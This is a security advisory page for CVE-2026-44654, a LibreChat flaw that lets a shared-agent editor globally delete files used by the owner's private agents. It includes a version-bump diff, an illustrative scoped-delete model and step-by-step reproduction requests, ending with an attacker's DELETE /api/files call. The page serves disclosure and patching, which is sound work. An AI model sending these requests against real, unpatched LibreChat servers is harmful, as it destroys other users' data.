VYPR
Medium severity · NVD Advisory · Published Jun 2, 2026

CVE-2026-44654

Description

LibreChat versions up to 0.8.3 allow a shared-agent editor to globally delete files, breaking the owner's other private agents that reuse the same file.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

LibreChat versions up to and including 0.8.3 contain a vulnerability where a user with the agent_editor role on a shared agent can delete file records globally via the DELETE /api/files endpoint. The deletion is not scoped to the agent context: if an owner reuses a file across multiple agents (one shared, one private), an editor of the shared agent can delete that file, rendering it inaccessible to the owner's private agent.

Exploitation

An attacker requires agent_editor access to a shared agent. The attacker first needs to know or discover a file_id that the owner has reused across both the shared agent and one of the owner's private agents. The attacker then sends a DELETE /api/files request, providing the file_id and filepath, which globally removes the file record. This action requires no interaction from the owner and can be performed remotely.

Impact

Successful exploitation results in a cross-agent integrity violation. The owner's private agents that reference the deleted file_id will retain a stale reference, causing them to break silently. The attacker gains no direct access to the owner's private agents or data, but can disrupt the owner's workflow by making files used in their private agents unavailable.

Mitigation

LibreChat version 0.8.4 contains a patch for this vulnerability. Users are advised to upgrade to version 0.8.4 or later. No workarounds are available other than upgrading. The vulnerability was verified against LibreChat v0.8.3 [1].

AI Insight generated on Jun 3, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

1

Patches

1
0736ff26686e

✨ v0.8.4 (#12339)

https://github.com/danny-avila/librechat · Danny Avila · Mar 20, 2026 · Fixed in 0.8.4 (via release-tag)
15 files changed · +1112 −284
  • api/package.json · +1 −1 · modified
    @@ -1,6 +1,6 @@
     {
       "name": "@librechat/backend",
    -  "version": "v0.8.4-rc1",
    +  "version": "v0.8.4",
       "description": "",
       "scripts": {
         "start": "echo 'please run this from the root directory'",
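Review bot: this hunk, like every other hunk in the commit, only moves "version" from v0.8.4-rc1 to v0.8.4; nothing shown touches the DELETE /api/files handler whose scoping the advisory says was fixed, so this release-tag commit marks the fixed version rather than carrying the fix. Whoever tracks the remediation should also link the commit that changed the file-deletion route, otherwise a reader auditing the patch list cannot see what was rescoped.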
    
  • bun.lock · +1090 −262 · modified
  • client/jest.config.cjs · +1 −1 · modified
    @@ -1,4 +1,4 @@
    -/** v0.8.4-rc1 */
    +/** v0.8.4 */
     module.exports = {
       roots: ['<rootDir>/src'],
       testEnvironment: 'jsdom',
    
  • client/package.json · +1 −1 · modified
    @@ -1,6 +1,6 @@
     {
       "name": "@librechat/frontend",
    -  "version": "v0.8.4-rc1",
    +  "version": "v0.8.4",
       "description": "",
       "type": "module",
       "scripts": {
    
  • Dockerfile · +1 −1 · modified
    @@ -1,4 +1,4 @@
    -# v0.8.4-rc1
    +# v0.8.4
     
     # Base node image
     FROM node:20-alpine AS node
    
  • Dockerfile.multi · +1 −1 · modified
    @@ -1,5 +1,5 @@
     # Dockerfile.multi
    -# v0.8.4-rc1
    +# v0.8.4
     
     # Set configurable max-old-space-size with default
     ARG NODE_MAX_OLD_SPACE_SIZE=6144
    
  • e2e/jestSetup.js · +1 −1 · modified
    @@ -1,3 +1,3 @@
    -// v0.8.4-rc1
    +// v0.8.4
     // See .env.test.example for an example of the '.env.test' file.
     require('dotenv').config({ path: './e2e/.env.test' });
    
  • helm/librechat/Chart.yaml · +2 −2 · modified
    @@ -15,15 +15,15 @@ type: application
     # This is the chart version. This version number should be incremented each time you make changes
     # to the chart and its templates, including the app version.
     # Versions are expected to follow Semantic Versioning (https://semver.org/)
    -version: 2.0.1
    +version: 2.0.2
     
     # This is the version number of the application being deployed. This version number should be
     # incremented each time you make changes to the application. Versions are not expected to
     # follow Semantic Versioning. They should reflect the version the application is using.
     # It is recommended to use it with quotes.
     
     # renovate: image=registry.librechat.ai/danny-avila/librechat
    -appVersion: "v0.8.4-rc1"
    +appVersion: "v0.8.4"
     
     home: https://www.librechat.ai
     
    
  • package.json · +1 −1 · modified
    @@ -1,6 +1,6 @@
     {
       "name": "LibreChat",
    -  "version": "v0.8.4-rc1",
    +  "version": "v0.8.4",
       "description": "",
       "packageManager": "npm@11.10.0",
       "workspaces": [
    
  • package-lock.json · +8 −8 · modified
    @@ -1,12 +1,12 @@
     {
       "name": "LibreChat",
    -  "version": "v0.8.4-rc1",
    +  "version": "v0.8.4",
       "lockfileVersion": 3,
       "requires": true,
       "packages": {
         "": {
           "name": "LibreChat",
    -      "version": "v0.8.4-rc1",
    +      "version": "v0.8.4",
           "license": "ISC",
           "workspaces": [
             "api",
    @@ -46,7 +46,7 @@
         },
         "api": {
           "name": "@librechat/backend",
    -      "version": "v0.8.4-rc1",
    +      "version": "v0.8.4",
           "license": "ISC",
           "dependencies": {
             "@anthropic-ai/vertex-sdk": "^0.14.3",
    @@ -430,7 +430,7 @@
         },
         "client": {
           "name": "@librechat/frontend",
    -      "version": "v0.8.4-rc1",
    +      "version": "v0.8.4",
           "license": "ISC",
           "dependencies": {
             "@ariakit/react": "^0.4.15",
    @@ -43808,7 +43808,7 @@
         },
         "packages/api": {
           "name": "@librechat/api",
    -      "version": "1.7.26",
    +      "version": "1.7.27",
           "license": "ISC",
           "devDependencies": {
             "@babel/preset-env": "^7.21.5",
    @@ -43928,7 +43928,7 @@
         },
         "packages/client": {
           "name": "@librechat/client",
    -      "version": "0.4.55",
    +      "version": "0.4.56",
           "devDependencies": {
             "@babel/core": "^7.28.5",
             "@babel/preset-env": "^7.28.5",
    @@ -45752,7 +45752,7 @@
         },
         "packages/data-provider": {
           "name": "librechat-data-provider",
    -      "version": "0.8.400",
    +      "version": "0.8.401",
           "license": "ISC",
           "dependencies": {
             "axios": "^1.13.5",
    @@ -45810,7 +45810,7 @@
         },
         "packages/data-schemas": {
           "name": "@librechat/data-schemas",
    -      "version": "0.0.39",
    +      "version": "0.0.40",
           "license": "MIT",
           "devDependencies": {
             "@rollup/plugin-alias": "^5.1.0",
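Review bot: the workspace versions bumped across these lockfile hunks (packages/api 1.7.27, packages/client 0.4.56, packages/data-provider 0.8.401, packages/data-schemas 0.0.40) match the corresponding package.json hunks, so package-lock.json is consistent with the manifests. The one file not shown is bun.lock (+1090 −262); a version-tag commit would not normally rewrite that many lock entries, so that diff is the one worth opening to confirm no dependency changed along with the tag.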
    
  • packages/api/package.json · +1 −1 · modified
    @@ -1,6 +1,6 @@
     {
       "name": "@librechat/api",
    -  "version": "1.7.26",
    +  "version": "1.7.27",
       "type": "commonjs",
       "description": "MCP services for LibreChat",
       "main": "dist/index.js",
    
  • packages/client/package.json · +1 −1 · modified
    @@ -1,6 +1,6 @@
     {
       "name": "@librechat/client",
    -  "version": "0.4.55",
    +  "version": "0.4.56",
       "description": "React components for LibreChat",
       "repository": {
         "type": "git",
    
  • packages/data-provider/package.json · +1 −1 · modified
    @@ -1,6 +1,6 @@
     {
       "name": "librechat-data-provider",
    -  "version": "0.8.400",
    +  "version": "0.8.401",
       "description": "data services for librechat apps",
       "main": "dist/index.js",
       "module": "dist/index.es.js",
    
  • packages/data-provider/src/config.ts · +1 −1 · modified
    @@ -1744,7 +1744,7 @@ export enum TTSProviders {
     /** Enum for app-wide constants */
     export enum Constants {
       /** Key for the app's version. */
    -  VERSION = 'v0.8.4-rc1',
    +  VERSION = 'v0.8.4',
       /** Key for the Custom Config's version (librechat.yaml). */
       CONFIG_VERSION = '1.3.6',
       /** Standard value for the first message's `parentMessageId` value, to indicate no parent exists. */
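Review bot: VERSION moves to 'v0.8.4' while CONFIG_VERSION stays at '1.3.6' two lines below, which is correct only if the librechat.yaml schema did not change in this release; keeping the two constants independent, as this hunk does, is the right call, but the release notes should state that the config version is unchanged so operators do not expect a config migration.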
    
  • packages/data-schemas/package.json · +1 −1 · modified
    @@ -1,6 +1,6 @@
     {
       "name": "@librechat/data-schemas",
    -  "version": "0.0.39",
    +  "version": "0.0.40",
       "description": "Mongoose schemas and models for LibreChat",
       "type": "module",
       "main": "dist/index.cjs",
    

Vulnerability mechanics

Root cause

"The file deletion endpoint does not scope deletions to the requesting agent, allowing global removal of shared file records."

Attack vector

An attacker with the `agent_editor` role on a shared agent can exploit this vulnerability. The precondition is that the owner has uploaded a file to the shared agent and reused the same `file_id` in one of their private agents. The attacker then sends a `DELETE /api/files` request specifying the `file_id` that is also used by the owner's private agent. This action globally removes the file record, breaking the owner's private agent.

Affected code

The vulnerability lies within the `DELETE /api/files` endpoint, which is responsible for removing file records. The advisory indicates that this endpoint removes file records by `file_id` without considering the agent context from which the request originates [ref_id=1].

What the fix does

The patch, released in version 0.8.4 [patch_id=4549435], addresses the vulnerability by ensuring that file deletions are scoped to the requesting agent's context. This prevents an editor of a shared agent from deleting files that are also referenced by the owner's private agents. The fix prevents cross-agent integrity violations by enforcing proper access controls on file resource management.
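To make the scoping concrete, here is an added example (not LibreChat's code, and not its actual fix) that models file records and agents in memory and contrasts the unscoped delete from the Vulnerability section with a delete limited to the requesting agent; buildLab, canEdit, deleteFilesUnscoped, deleteFilesScoped, agentIntact and the sample users and ids are assumptions.

```javascript
// Added illustration, not LibreChat's code: in-memory file records and agents,
// contrasting the unscoped delete the advisory describes with a scoped one.
// Constructed lab: owner "alice" shares agent "shared" with editor "bob" and
// reuses file "f1" in her private agent "private". All names are assumed.
function buildLab() {
  const files = new Map([['f1', { owner: 'alice', filepath: 'files/f1.txt' }]]);
  const agents = new Map([
    ['shared', { owner: 'alice', editors: new Set(['bob']), fileIds: new Set(['f1']) }],
    ['private', { owner: 'alice', editors: new Set(), fileIds: new Set(['f1']) }],
  ]);
  return { files, agents };
}

// Authorization shared by both handlers: the caller must own or edit the agent.
function canEdit(agents, req) {
  const agent = agents.get(req.agentId);
  return agent && (agent.owner === req.user || agent.editors.has(req.user)) ? agent : null;
}

// Pre-fix behaviour as the advisory describes it: access is checked against
// the agent, but the file record is then removed globally.
function deleteFilesUnscoped({ files, agents }, req) {
  if (!canEdit(agents, req)) return { ok: false, reason: 'forbidden' };
  for (const { file_id } of req.files) files.delete(file_id);
  return { ok: true };
}

// Scoped behaviour: detach the file from the requesting agent only. The global
// record is removed only when the requester owns it and no agent still uses it.
function deleteFilesScoped({ files, agents }, req) {
  const agent = canEdit(agents, req);
  if (!agent) return { ok: false, reason: 'forbidden' };
  const detached = [], removed = [];
  for (const { file_id } of req.files) {
    if (!agent.fileIds.has(file_id)) continue; // not attached here: no-op
    agent.fileIds.delete(file_id);
    detached.push(file_id);
    const rec = files.get(file_id);
    const stillUsed = [...agents.values()].some((a) => a.fileIds.has(file_id));
    if (rec && rec.owner === req.user && !stillUsed) {
      files.delete(file_id);
      removed.push(file_id);
    }
  }
  return { ok: true, detached, removed };
}

// True when every file the agent references still has a record.
function agentIntact({ files, agents }, agentId) {
  return [...agents.get(agentId).fileIds].every((id) => files.has(id));
}
```

With the scoped handler, the editor's request detaches the file from the shared agent but leaves the owner's record and private agent intact; only the owner, once no agent still references the file, can remove the record itself.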

Preconditions

  • auth: Attacker must have the `agent_editor` role on a shared agent.
  • input: Owner must have uploaded a file to a shared agent and reused the same `file_id` in a private agent.

Reproduction

Verified against LibreChat v0.8.3 Docker lab on 2026-03-17. Prerequisites: Admin account with agents enabled. Set LIBRECHAT_ADMIN_EMAIL and LIBRECHAT_ADMIN_PASSWORD.

# Run the full PoC script:
export LIBRECHAT_ADMIN_EMAIL="admin@lab.test"
export LIBRECHAT_ADMIN_PASSWORD="AdminPass123!"
export LIBRECHAT_BASE_URL="http://127.0.0.1:3080"
python3 targets/librechat/pocs/shared_agent_file_global_delete.py

Step-by-step reproduction:

Admin creates two agents — one shared, one private:

POST /api/agents {"name":"shared-file-agent",...} → shared_agent_id
POST /api/agents {"name":"private-file-agent",...} → private_agent_id

Admin uploads a file to the shared agent:

POST /api/files (multipart: endpoint=agents, agent_id=shared_agent_id, file=lab.txt) → {"file_id":"9c393c08-...","filepath":"files/..."}

Admin reuses the same file_id on the private agent:

PATCH /api/agents/{private_agent_id} {"tool_resources":{"context":{"file_ids":["9c393c08-..."]}}}

Admin shares the shared agent with the attacker as agent_editor:

PUT /api/permissions/agent/{object_id} {"updated":[{"id":"attacker_id","accessRoleId":"agent_editor"}]}

Attacker deletes the file through /api/files (the cross-agent destructive action):

DELETE /api/files -H "Authorization: Bearer $ATTACKER_TOKEN" -d '{"files":[{"file_id":"9c393c08-...","filepath":"files/..."}],"agent_id":"shared_agent_id","tool_resource":"context"}'

Owner's private agent is now broken:

GET /api/files/agent/{private_agent_id} → file_id "9c393c08-..." is GONE — globally deleted

Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

1
